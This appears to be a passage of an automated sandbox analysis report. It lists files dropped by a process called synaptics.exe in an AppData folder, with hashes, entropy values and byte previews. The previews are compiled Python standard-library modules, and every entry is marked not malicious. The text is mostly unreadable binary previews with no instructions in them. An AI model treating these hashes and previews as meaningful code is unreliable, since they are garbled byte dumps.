                                                                                                                                                                                                            Preview:o.......Z.,d.g.......................@...sT...d.Z.d.Z.d.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.d.d.l.m.Z...e...d.e.j...Z.e...d.e.j...Z.d.d.l.Z.e.j.g.d.....Z.[.G.d.d...d.e...d.d.....Z.d.d...Z.d.d...Z.d.d...Z.d.Z.d.Z.e.e.d.e.......e.e.....Z.d.Z d.Z!d.Z"d.Z#d.Z$e.e!e"e#e$..Z%d.Z&e.d.d ..e.e&....Z'd!e&..Z(e.e'e(..Z)e.d"e)d#....Z*e.e*e)e%..Z+d$d%..Z,e.j-d&d'....Z.e.e,....Z/d(Z0d)Z1d*Z2d+Z3e.e/d,..e/d-....Z4e.e/d...e/d/....Z5e.e6e.j7e8e.d0d1......Z9e.d2e9..Z:e.e+e:e5e ..Z;e.e;..Z<e.e/d3..e.d4d.....e/d5..e.d6d.......Z=e.d7e.e4..Z>e.e.e>e+e:e=e ....Z?i.Z@e,..D.].ZAe0e@eAd4..<.e1e@eAd6..<.e2e@eAd,..<.e3e@eAd-..<...q.eB..ZCeB..ZDe,..D.]%ZEeEd6..eEd4..f.D.].ZFeC.GeF......qIeEd-..eEd,..f.D.].ZFeD.GeF......qZ..q?d8ZHG.d9d:..d:eI..ZJG.d;d<..d<eI..ZKG.d=d>..d>..ZLd?d@..ZMdAdB..ZNdCdD..ZOdEdF..Z.dGdH..ZPdIdJ..ZQdKdL..ZRdMdN..ZSeTdOk...r.eS....d.S.d.S.)Pao...Tokenization help for Python programs...tokenize(readline) is a generator that breaks a stream
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):21732
                                                                                                                                                                                                            Entropy (8bit):5.296919422795521
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:Too9MGsSgHvgJJpLbiO+pSbnwRG+SbL3JWFsFmppQigBsKU9l4UiTdBq:Too9jcHvIJpiJAngzSBhU9l4UiTdBq
                                                                                                                                                                                                            MD5:BF3E8753F779862BA0BCF29545B1E907
                                                                                                                                                                                                            SHA1:744BCE5598EA8AE605BF633B34ED293426D37581
                                                                                                                                                                                                            SHA-256:8EE2DDFDB65C43AC895D8EC2A7BB503690C997A3226964D0F34662E9A11B0AA2
                                                                                                                                                                                                            SHA-512:417F05436F868861BFA87B4946F78A974E292CC3F54734351B8C8C3EBF8F775A50567BE8A7B0BAC55976F4D5A3BBBA0BB4023D17B313A341BF952E21E8D35F3B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.i.......................@...sJ...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.d8d.d...Z.d.d...Z.d9d.d...Z.d8d.d...Z.d8d.d...Z.d.Z.d.Z.G.d.d...d...Z.e...Z.d.d...Z.e.e.d.d.d.f.d.d...Z.e.e.d.d.f.d.d...Z.e.f.d.d...Z.d.d...Z.d.d...Z.d:d.d ..Z.d;d!d"..Z.d:d#d$..Z.d<d%d&..Z.d9d'd(..Z.d9d)d*..Z.d+d,..Z.G.d-d...d...Z.d/d0..Z.d1d2..Z.d3Z.G.d4d5..d5e ..Z!G.d6d7..d7..Z"d.S.)=z@Extract, format and print information about Python stack traces......N)...extract_stack..extract_tb..format_exception..format_exception_only..format_list..format_stack..format_tb..print_exc..format_exc..print_exception..print_last..print_stack..print_tb..clear_frames..FrameSummary..StackSummary..TracebackException..walk_stack..walk_tbc....................C...s4...|.d.u.r.t.j.}.t...|.......D.].}.t.|.|.d.d.....q.d.S.).zyPrint the list of tuples as returned by extract_tb() or. extract_stack() as a formatted stack trace to the given file.N......file..end)...sys..stderrr......from_list..format..print)...extracted_l
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9549
                                                                                                                                                                                                            Entropy (8bit):5.1495837346134135
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:x8BGSXkI30AX7ad5RV7VIPNmXkXFNlO8U2UuLWnxq3juXvypQ1SwDFBL0GSSSOS6:mBGgfLoV4NmAFyvWLwx8pOXU/I+rjmV
                                                                                                                                                                                                            MD5:AE0C4BBFE40F0B0BC8DC4717858F8073
                                                                                                                                                                                                            SHA1:82A1FE83DDBC3345A3970FA6279410D72E539D7A
                                                                                                                                                                                                            SHA-256:0E2E5749871E0A6940A509925268D813A0E9697FC2842FF24612794340AA2270
                                                                                                                                                                                                            SHA-512:5329765E6C3BAD10DA682197DE1440EB053A1F8989CB5CB7AC20D1F643AF48D83BBA9BE57D49EB4F3DC73DE6717F692F8DF815812DC18CFA1461191F09F454A0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.(.......................@...s....d.Z.d.d.l.Z.d.d...Z.e.e...Z.e.d.d.....Z.e.e.j...Z.e.e.j...Z.e.e.j...Z.d.d...Z.e.e.....Z.d.d...Z.e.e.....Z.d.d...Z.e...Z.e.e...Z.e.......d.d...Z.e...Z.e.e...Z.G.d.d...d...Z.e.e...j...Z.e.e...Z.e.g.j...Z.e.e.j...Z.e.e...j...Z e.e!j"..Z#e.e$j.d.....Z%e.e...Z&z.e'....e'y.......e..(..d...Z)e.e)..Z*e.e)j+..Z,d.Z)[)Y.n.w.e.e.j...Z-e.e.j...Z/[.[.[.[.[.[.d$d.d...Z0d.d...Z1d%d.d...Z2d.d...Z3G.d.d...d...Z4G.d.d...d...Z5d d!..Z6e.e7e8....Z9e.e8e!B...Z:e.e;..Z<e.d...Z=e.e>..Z?d"d#..e@..D...ZAd.S.)&zO.Define names for built-in types that aren't directly accessible as a builtin.......Nc....................C........d.S...N..r....r....r.....4C:\Users\user\AppData\Local\xFSOj9El1Q\lib\types.py.._f...........r....c....................C...r....r....r....r....r....r....r......<lambda>....r....r....c........................s....d.....f.d.d...}.|.j.d...S.).N.....c........................r....r....r....r........ar....r......f....r....z._cell_factory.<locals>.fr..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):85301
                                                                                                                                                                                                            Entropy (8bit):5.275038230847264
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:+CitWnXfBkzWWZGNt2akuICUSA3yZS+Kug/kzVWqn1poHezYLXH1UXWbAyitL5U+:l6oWu5Gug8fAHeOVD8Vo+
                                                                                                                                                                                                            MD5:E05DDA2BF561D4DB121B86371F4EA76A
                                                                                                                                                                                                            SHA1:A1BEAA91D538241FE065B9F5BB19B5FCD8D18E62
                                                                                                                                                                                                            SHA-256:25CDF3A59131FA610FD852ED733017D1DA87E36F25C0DE69DF2AE2D273D1C6A3
                                                                                                                                                                                                            SHA-512:DEB4E73BE8392C26276AE6D27AB3F7D7384F5A9D9172D623298BA2147ED9C6BFE9A72D49F8C71F1BEB0B591752989AD4CA3D47C54CFB62D89542B87384F24AF7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.t.......................@...s....d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...g.d...Z.d.d.d...d.d...Z.d.d.d...d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.g.Z.d.d.d...d.d...Z.e...f.d d!..Z.G.d"d#..d#..Z G.d$d%..d%..Z!G.d&d'..d'e d.d(..Z"G.d)d*..d*e"d.d(..Z#e"d+d,....Z$e"d-d.....Z%e"d/d0....Z&e"d1d2....Z'e"d3d4....Z(e"d5d6....Z)e#e.d.d...d7d8......Z*e"d9d:....Z+e"d;d<....Z,e"d=d>....Z-G.d?d@..d@e d.d(..Z.G.dAdB..dB..Z/G.dCdD..dDe e!e/d.d(..Z0G.dEdF..dFe e!d.d(..Z1G.dGdH..dHe e!d.d(..Z2G.dIdJ..dJe e!e/d.d(..Z3dKdL..Z4G.dMdN..dNe d.d(..Z5G.dOdP..dPe5d.d(..Z6G.dQdR..dRe5d.d(..Z7G.dSdT..dTe6d.d(..Z8G.dUdV..dVe7d.d(..Z9G.dWdX..dXe7d.d(..Z:G.dYdZ..dZe6d.d(..Z;d[d\..Z<G.d]d^..d^e6d.d(..Z=G.d_d`..d`e6d.d(..Z>G.dadb..db..Z?G.dcdd..dd..Z@G.dedf..df..ZAg.dg..ZBg.dh..ZCeBeC..dig...ZDdjdk..ZEdldm..ZFdndo..ZGd.drds..ZHd.dudv..ZIg.dw..dxdyg.dz..ZJG.d{d|..d|e...ZKG.d}d~..d~e?eKd...ZLG.d.d...d.e6d.d(
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3712
                                                                                                                                                                                                            Entropy (8bit):5.568200782392551
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:N6lByWyhU9ShozDLcLmxESqc0Ic5k4CW76a0:N6lByWS2zECW3u4gD
                                                                                                                                                                                                            MD5:B80FCA4143B70F12E06B7453668E9AF0
                                                                                                                                                                                                            SHA1:5851CCC71587EE2736518369D6C1C045020EB144
                                                                                                                                                                                                            SHA-256:110067B171685850D3253DBA45531F11ADD81FB1CA5DC46BD419E0B738FA06D4
                                                                                                                                                                                                            SHA-512:F24C552497D682D5E288421AA7AE5AEA3A70FC7FC1208F48B497FFD594E891D55843B9CAE650E2698236CD97588100562B984AA85B735F9005F05A44424AAFA0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...sl...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.G.d.d...d.e...Z.d.d.d...d.d...Z.d.d.d...Z.d.d...Z.e.d.k.r4e.....d.S.d.S.).z.Implementation of the UUencode and UUdecode functions...encode(in_file, out_file [,name, mode], *, backtick=False).decode(in_file [, out_file, mode, quiet])......N)...Error..encode..decodec....................@...s....e.Z.d.Z.d.S.).r....N)...__name__..__module__..__qualname__..r....r.....1C:\Users\user\AppData\Local\xFSOj9El1Q\lib\uu.pyr....'...s........r....F....backtickc....................C...sx...g.}.z.|.d.k.r.t.j.j.}.n/t.|.t...r;|.d.u.r.t.j...|...}.|.d.u.r1z.t...|...j.}.W.n...t.y0......Y.n.w.t.|.d...}.|...|.....|.d.k.rDt.j.j.}.n.t.|.t...rSt.|.d...}.|...|.....|.d.u.rYd.}.|.d.u.r_d.}.|...d.d...}.|...d.d...}.|...d.|.d.@.|.f.....d.......|...d...}.t.|...d.k.r.|...t.j.|.|.d.......|...d...}.t.|...d.k.s.|.r.|...d.....n.|...d.....W.|.D.].}.|.......q.d.S.|.D.].}.|.......q.w.).z.Uuencode file..-N..rb..wbi.......z.\n...z.\rz.begin %o %s
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):13670
                                                                                                                                                                                                            Entropy (8bit):5.379508169226183
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:7Bo+bxHagj6xo0+t6p6l0y8pym5hlSxbFBdbvywKVv3dxZuC1J:7VFHagj6xLM6GaEbFBdryJ/dxZuC1J
                                                                                                                                                                                                            MD5:1FD81B78731A082606CA8EC2625B4A43
                                                                                                                                                                                                            SHA1:6F2407F8224BB58C2E9F0CC1A36A602E99F4249D
                                                                                                                                                                                                            SHA-256:EC446A5794F143054B6D4B31462B5E6DD8C4A01BA0C93BF74850A33F93CFF956
                                                                                                                                                                                                            SHA-512:462F5CC73DD492F374AD98BAAB38F4E4CDB04A881EFE7AEEFE5D2DE3F5421836B062ACDE1C8176FE289363F867F7EE068A25F9511D1E7BD8F11A6C057B46C51F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.O.......................@...s....d.Z.d.d.l.Z.g.d...Z.d=d.d...Z.d>d.d...Z.d.d...Z.d.d...Z.e.Z.d.d...Z.e.Z.d.d...Z.d.e.d.d.d.f.d.d...Z.e.d.d.f.d.d...Z.d.d...Z.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.d...Z.d d!..Z.d"d#..Z.d$d%..Z.d&d'..Z.d?d)d*..Z.....d@d+d,..Z.G.d-d...d.e...Z.G.d/d0..d0e...Z.d1d2..Z.z.d.d3l.m.Z.m Z m!Z!m.Z.m.Z.m"Z"..e Z#e!Z$d4Z%W.n...e&y.......g.Z.d5Z#i.Z$d(a'd6d7..Z"d.Z%Y.n.w.e.e.j(....e%s.e)e.d8..s.e.d5e*d9d(d:....e.d;e*d(d<....e.d;e+d(d<....e.d;e,d(d<....e.d;e-d(d<....[%d.S.)Az&Python part of the warnings subsystem......N)...warn..warn_explicit..showwarning..formatwarning..filterwarnings..simplefilter..resetwarnings..catch_warningsc....................C...s....t.|.|.|.|.|.|...}.t.|.....d.S.)..7Hook to write a warning to a file; replace if you like.N)...WarningMessage.._showwarnmsg_impl)...message..category..filename..lineno..file..line..msg..r.....7C:\Users\user\AppData\Local\xFSOj9El1Q\lib\warnings.pyr........s........r....c....................C...s....t.|.|.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):20367
                                                                                                                                                                                                            Entropy (8bit):5.08430069875515
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:tjNLmhczEtRkD2ofjXd7AMlM/DgWryRjKj8j/XBNOjEUWYh1xL0D:tpmhWSRkSUXd7xyDDyDjOjbWISD
                                                                                                                                                                                                            MD5:B996D336E1774CA1D3633215FB473155
                                                                                                                                                                                                            SHA1:DB2155B4E78ABEBBC61CEAF80CE404D4BE6966A5
                                                                                                                                                                                                            SHA-256:E628D8E6863975D0716F4ED4E38862DA57FB9253D69BBCC5DC7E3A41B5473C48
                                                                                                                                                                                                            SHA-512:CBABEE83EED0F23429C4171D2C51B292DDEDFE037D5B2D8D9F2C16205552BA8FF32A4E5F3D4C00C7C061CEFCEFE1C8A05F406FB1D9736A0CC78153EE39DFE98C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.V.......................@...s....d.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.e.e.f.Z.g.d...Z.e.j...e.....e.j...e.....G.d.d...d.e...Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e.j...Z.G.d.d...d...Z.d.S.).z|Weak reference support for Python...This module is an implementation of PEP 205:..https://www.python.org/dev/peps/pep-0205/......)...getweakrefcount..getweakrefs..ref..proxy..CallableProxyType..ProxyType..ReferenceType.._remove_dead_weakref)...WeakSet.._IterationGuardN).r....r....r....r......WeakKeyDictionaryr....r....r......ProxyTypes..WeakValueDictionaryr......WeakMethod..finalizec........................sD...e.Z.d.Z.d.Z.d.Z.d.d.d...Z...f.d.d...Z.d.d...Z.d.d...Z.e.j.Z.....Z.S.).r....z.. A custom `weakref.ref` subclass which simulates a weak reference to. a bound method, working around the lifetime problem of bound methods.. )..._func_ref.._meth_type.._alive..__weakref__Nc........................sx...z.|.j.}.|.j.}.W.n...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):61059
                                                                                                                                                                                                            Entropy (8bit):5.527627295914353
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:X5DKf6qzuikPr0x8uc4PT1+Y9sW1EynK5c7z0p+YHiBZ:JnqyPr0DhXFAp76
                                                                                                                                                                                                            MD5:3B2544D4E5610668B9A4618CF336F8FE
                                                                                                                                                                                                            SHA1:08F3DBE2504C75CBD3A1BA0153CA802CB6C17CFC
                                                                                                                                                                                                            SHA-256:1428E275476516EBFA0F4361BF8D790110AB227B14F7F9F751AABF5232E1721E
                                                                                                                                                                                                            SHA-512:5C298AA5FA3E1BC31DFE9F2C43DB483B82F5D8AFFCDC2DE4919D2BD4E56A3D2063B1EF8C0B021540D0128043E85A4D5DF3A9774E5EE0B5B6C4881A6842133D5C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.g.......................@...sD...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.z.d.d.l.Z.e.j.Z.W.n...e.yQ......d.Z.e.j.Z.Y.n.w.z.d.d.l.Z.W.n...e.yc......d.Z.Y.n.w.z.d.d.l.Z.W.n...e.yu......d.Z.Y.n.w.g.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.e...Z.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z d.Z!d.Z"d.Z#d.Z$d.Z%d.Z&d.Z'd.Z(e..)e'..Z*d.Z+d.Z,d.Z-d.Z.d.Z/d.Z0d.Z1d.Z2d.Z3d.Z4d.Z5d.Z6e..)e5..Z7d.Z8d.Z9d.Z:d.Z;d.Z<d.Z=d.Z>d.Z?d.Z@d.ZAd.ZBd.ZCd.ZDd.ZEd.ZFd ZGd!ZHd"ZId#ZJd$ZKd%ZLe..)eK..ZMd.ZNd.ZOd.ZPd.ZQd.ZRd.ZSd.ZTd.ZUd.ZVd.ZWd.ZXd.ZYd&ZZd'Z[e..)eZ..Z\d(Z]d)Z^e..)e]..Z_d.Z`d.Zad.Zbd.Zcd.Zdd.Zed.Zfd.Zgd.Zhd.Zid*Zje..kd+..Zld,d-..Zmd.d/..Znd0d1..Zod2d3..Zpd4d5..ZqG.d6d7..d7er..Zsd.atd8d9..Zud:d;..ZvG.d<d=..d=..ZwG.d>d?..d?..Zxi.d.d@..d.dA..d.dB..d.dB..d.dB..d.dB..d.dC..d.dD..d.dE..d.dF..d.dC..d.dG..d.dH..d#dI..dJdK..dLdM..dNdO..ZydPdQ..ZzdsdRdS..Z{dTdU..Z|G.dVdW..dW..Z}G.dXdY..dY..Z~G.dZd[..d[e.j...Z.G.d\d]..d]e.j...Z.G.d^d_..d_..Z.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):48477
                                                                                                                                                                                                            Entropy (8bit):5.122489611728904
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:YbNUurnFDpytMbeGzDRBPou+eQyWImBfbGm49WxxSNo4Q+M2PvUPPAeOTMtJcCnM:CNtFDpyTGzDRBPoJImBfbGm49WxENbQ8
                                                                                                                                                                                                            MD5:8FD7C73CF7A2806714EBB340666B3669
                                                                                                                                                                                                            SHA1:2B340D8C9ED15252561791C3101FC2E7368F8F10
                                                                                                                                                                                                            SHA-256:E6B67631C802547C00F607CF9FCEB133178CFA9ECD0984CA804640AB7A2A369C
                                                                                                                                                                                                            SHA-512:69EF0FD49B454818711017C270568B5D8E259510F9C42AA33CB0EDA9BB95E5AE8FF86AB5BA5FDC03FFDB8E7C8B45E24B841CB56B9B39D2C10812881380EDE1AB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...z.d.d.l.m.Z...W.n...e.yO......Y.n.w.e.j...e.....z.d.d.l.m.Z...W.n...e.yg......Y.n.w.G.d.d...d.e.j ..Z!G.d.d...d.e.j"..Z#G.d.d...d.e.j$..Z%G.d.d...d.e&..Z'G.d.d...d.e(..Z)z.d.d.l.m)Z)..W.n...e.y.......Y.n.w.z.d.d.l.m*Z*..W.n...e.y.......d.d...Z*Y.n.w.d.d.d.d...d.d...Z+d d!..Z,z.d.d"l.m,Z,..W.n...e.y.......Y.n.w.G.d#d$..d$e(..Z-G.d%d&..d&e.j...Z/G.d'd(..d(e.j...Z0G.d)d*..d*e.j...Z1G.d+d,..d,e.j2..Z3d.S.)-a?...This module implements specialized container datatypes providing.alternatives to Python's general purpose built-in containers, dict,.list, set, and tuple...* namedtuple factory function for creating tuple subclasses with named fields.* deque list-like container with fast appends and pops on either end.* ChainMap dict-like class for creating a single view of multiple mappings.* Counter dict subclass
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):262
                                                                                                                                                                                                            Entropy (8bit):4.869245191962833
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:y/C/0eC5VvkFZlaE+MdF/Hj5J+ruwkn23h/axtGdgIun:CC/0eC7gj+Er+NfsbGdcn
                                                                                                                                                                                                            MD5:0370562593AF7C0A36EC1365C698F80A
                                                                                                                                                                                                            SHA1:674373F58DC2F59260E6CDA2F59B2DFEF38D1E98
                                                                                                                                                                                                            SHA-256:F0D14C5E36A8299F8027BFDA0337962F2C7BF12E627DA6E548D95276918AB447
                                                                                                                                                                                                            SHA-512:56D9B36325821ABD0CA18BE3B293F0EBB392B1750ACDF5393796C6A9C90FD87EF77706F23870E4729E4BC6CDAC2E3E33AA1CD9CA15020047BE344DADE8458625
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,dz........................@...s$...d.d.l.T.d.d.l.m.Z...d.d.l.m.Z...d.S.)......)...*)...__all__)..._CallableGenericAliasN)..._collections_abcr....r......r....r.....>C:\Users\user\AppData\Local\xFSOj9El1Q\lib\collections\abc.py..<module>....s..........
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):15906
                                                                                                                                                                                                            Entropy (8bit):5.335534775022113
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:JoMRQLVaCuKN1r9u1u2RTCQzweSkqxo5IbeX6EoV:JoMoVJ9u1d9wqpIbQBoV
                                                                                                                                                                                                            MD5:1454BEB191FEA587ACAB35A916F1E2E0
                                                                                                                                                                                                            SHA1:383E0DC5B97BBEC677B470D49F1E65F0ACA26F29
                                                                                                                                                                                                            SHA-256:D3E4F78D9D84E126B717963FCECA42DEEBE08C9290E657650887EA24DCD9B3E2
                                                                                                                                                                                                            SHA-512:88CECB7C8B07EAFF91B1539D28237DE8862205D97B0F14392809CA35A05BC6293C324787CBA785648BBDC8E35477A2D4B5BC8773BDE3890901FF86EB6A94F005
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,dwH.......................@...s(...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.e.k.rJe.d.e.e.....e.j.d.k.rUd.d.l.m.Z...e.Z.e.j.d.k.rqe.j.d.k.rqe.e.....j...d...d.....d.k.rqe.Z.d.d.l.m.Z m!Z"m#Z$m%Z&..d}d.d...Z'd}d.d...Z(i.Z)d.d...Z*e.j.d.k.r.d.d.l.m+Z,..d.d.l.m-Z...i.Z/d.d...Z0e0j.r.e*j..1d.d...e0_.n.e.j.d.k.r.d.d.l.m2Z,..d.d.l.m3Z3m4Z4m5Z5m6Z6m7Z7..d.d.l.m8Z8m9Z9..d.d l.m:Z:..d}d!d"..Z;G.d#d$..d$e:..Z<e;e<d%....G.d&d'..d'e:..Z=e;e=....G.d(d)..d)e:..Z>e;e>....G.d*d+..d+e:..Z?e;e?....G.d,d-..d-e:..Z@e;e@....e.d...e.d/..k...r'e?ZAe@ZBn.G.d0d1..d1e:..ZAe;eA....G.d2d3..d3e:..ZBe;eB....G.d4d5..d5e:..ZCe;eC....G.d6d7..d7e:..ZDe;eD....G.d8d9..d9e:..ZEe3eE..e3eD..k...rjeDZEe.d/..e.d:..k...rxe?ZFe@ZGn.G.d;d<..d<e:..ZFe;eF....G.d=d>..d>e:..ZGe;eG....G.d?d@..d@e:..ZHeH..eH_IeH_Je;eH....G.dAdB..dBe:..ZKeK..eK_IeK_Je;eK....G.dCdD..dDe:..ZLeL..eL_IeL_Je;eL....G.dEdF..dFe:..ZMe;eMd%....G.dGdH..dHe:..ZNeNZO
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1925
                                                                                                                                                                                                            Entropy (8bit):5.221834044888936
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:lg7p1APBJ0tfAE4EBxn4rX4kbruu/fdq7RvRhPAEV5wq:S6r0OhiuLtV1qRoEV9
                                                                                                                                                                                                            MD5:994D869634ED8F17B756D85CDD2F0DAF
                                                                                                                                                                                                            SHA1:A90D6DF5C66740F3E5E448472FAF8310AEF26A09
                                                                                                                                                                                                            SHA-256:44D8A40A16B58891C3CAEE9222E974AE3497DE5218D9675EBEA7C3BE423054C7
                                                                                                                                                                                                            SHA-512:0BB4C96F1CE1FE7578D052822356138DF2DCAD86A9533E0E90F4133F9BF751A5D865EDD9CC8B81A7DB46948CF3E546274CE4A62333C442F648CF2AD26058FABC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.d.l.Z.d.d.l.T.e.e...Z.d.d...Z.G.d.d...d.e.e.....Z.e.j.d.k.r/d.Z.e.Z.G.d.d...d.e.e.d...Z.d.S.e.j.d.k.rDd.Z.e.Z.G.d.d...d.e.e.d...Z.d.S.e.d.....)......N)...*c....................C...sH...t.|.t...r.t.|.t...S.t.|.t...r.t.|.j...|.j...S.t.|.t...r.|.S.t.d.|.......).z.Return the type with the 'other' byte order. Simple types like. c_int and so on already have __ctype_be__ and __ctype_le__. attributes which contain the types, for more complicated types. arrays and structures are supported.. z+This type does not support other endian: %s)...hasattr.._OTHER_ENDIAN..getattr..isinstance.._array_type.._other_endian.._type_Z._length_..issubclass..Structure..TypeError)...typ..r.....=C:\Users\user\AppData\Local\xFSOj9El1Q\lib\ctypes\_endian.pyr........s..................r....c........................s....e.Z.d.Z...f.d.d...Z.....Z.S.)..._swapped_metac........................s^...|.d.k.r&g.}.|.D.].}.|.d...}.|.d...}.|.d.d.....}.|...|.t.|...f.|..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8336
                                                                                                                                                                                                            Entropy (8bit):5.4805616719126125
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:7+G6fCXBDrl73zbXCL3mm0LGuZ7Iv0nwMXwDRi4qzDj:7lOiDp7Do0LGutnwMXExqzDj
                                                                                                                                                                                                            MD5:B1639BBF1BA37A93C5E52FA2983B7402
                                                                                                                                                                                                            SHA1:37FBD8493E2E27D8B024266FF4ECF54E765194B2
                                                                                                                                                                                                            SHA-256:BF748A82208787C943B58EA15930BD8F90DE2F3F3005755C589114CAB03BDC0D
                                                                                                                                                                                                            SHA-512:8FA28582A129128DA8A1B93019345E34B9710AEF6CECB11A59047B600D1A8E96685E38E7FDA4CA88EA0FA574A7ACE7A04BA73432E4E4F5FF06C8591B203FA8A5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
